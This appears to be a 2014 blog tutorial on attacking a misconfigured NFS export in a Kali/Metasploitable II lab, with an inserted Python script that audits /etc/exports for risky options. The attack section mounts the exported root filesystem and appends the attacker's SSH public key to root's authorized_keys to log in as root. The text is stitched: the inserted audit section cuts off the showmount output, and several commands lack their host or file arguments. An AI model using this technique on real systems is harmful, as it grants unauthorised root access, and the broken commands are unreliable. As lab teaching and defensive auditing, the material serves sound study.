Thursday, 13 March 2014

Unix Fundamentals - NFS Service / Attack Illustration

This post looks at the Network File System (NFS). NFS can be identified by probing port 2049 directly or by asking the portmapper for a list of registered services. The example below uses rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. You will need the rpcbind and nfs-common Ubuntu packages to follow along.

root@ubuntu:~# rpcinfo -p
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs

root@ubuntu:~# showmount -e
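The weakness the rest of this post relies on is visible in the export definition itself: the filesystem root exported read-write to every host, with root squashing disabled. As an added example (not part of the original post), the following Python script parses text in /etc/exports format and rates each export so a defender can spot that configuration before an attacker does. The exports lines are a constructed sample; the Metasploitable-style "/" entry is shown next to two safer entries for comparison.

```python
"""Audit NFS export definitions for the misconfiguration shown above:
a filesystem root exported read-write to any host without root squashing.

Added example, not part of the original post. SAMPLE_EXPORTS is constructed.
"""

import re
from typing import Dict, List, Set

# Constructed sample in /etc/exports syntax: path, then one or more
# client(options) groups. An empty client field means "any host".
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/               *(rw,sync,no_root_squash,no_subtree_check)
/srv/share      192.168.56.0/24(rw,sync,root_squash)
/home/public    *(ro,sync,all_squash)
"""

_CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text: str) -> List[Dict]:
    """Return one record per (path, client) pair: path, client, options."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blanks
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], parts[1:]
        for client in clients:
            m = _CLIENT_RE.match(client)
            host = m.group(1) or "*"          # "(rw)" with no host = everyone
            opts: Set[str] = set(filter(None, (m.group(2) or "").split(",")))
            entries.append({"path": path, "client": host, "options": opts})
    return entries


def severity(entry: Dict) -> str:
    """Rate an export. NFS defaults are ro and root_squash, so an export is
    only dangerous when rw and/or no_root_squash are stated explicitly."""
    opts = entry["options"]
    everyone = entry["client"] == "*"
    writable = "rw" in opts
    no_squash = "no_root_squash" in opts
    if writable and everyone and no_squash:
        return "critical"   # anyone can write files owned by root (this post)
    if writable and (everyone or no_squash):
        return "high"
    if everyone or entry["path"] == "/":
        return "medium"     # world-readable, or the whole root tree exposed
    return "ok"


def audit_exports(text: str) -> List[Dict]:
    """Parse exports text and attach a severity to each record."""
    results = []
    for entry in parse_exports(text):
        entry = dict(entry, severity=severity(entry))
        results.append(entry)
    return results


if __name__ == "__main__":
    for r in audit_exports(SAMPLE_EXPORTS):
        print(f"{r['severity']:8} {r['path']:14} {r['client']:18} "
              f"{','.join(sorted(r['options']))}")
```

On a real host, feed the script the contents of /etc/exports (or the output of exportfs -v) instead of the constructed sample; anything rated critical is the situation shown in this post and should be fixed by restricting the client list, dropping rw where it is not needed, and leaving root_squash at its default.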

Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file: 

root@ubuntu:~# ssh-keygen
root@ubuntu:~# mkdir /tmp/r00t
root@ubuntu:~# mount -t nfs /tmp/r00t/
rpc.statd is not running but is required for remote locking.
mount.nfs: Either use '-o nolock' to keep locks local, or start statd.
mount.nfs: an incorrect mount option was specified.

This is the message you get when you try to mount the NFS export.

Restarting nfs-common is not enough:

  • service nfs-common restart

Restarting rpcbind resolves the issue:

  • service rpcbind restart

root@ubuntu:~# cat /root/.ssh/ >> /tmp/r00t/root/.ssh/authorized_keys 

ssh root@ 

With the passphrase chosen during ssh-keygen (our public key having been appended to the account's authorized_keys file on the remote machine), we can now log in to the remote system. Yay.


The environment includes Kali and Metasploitable II.
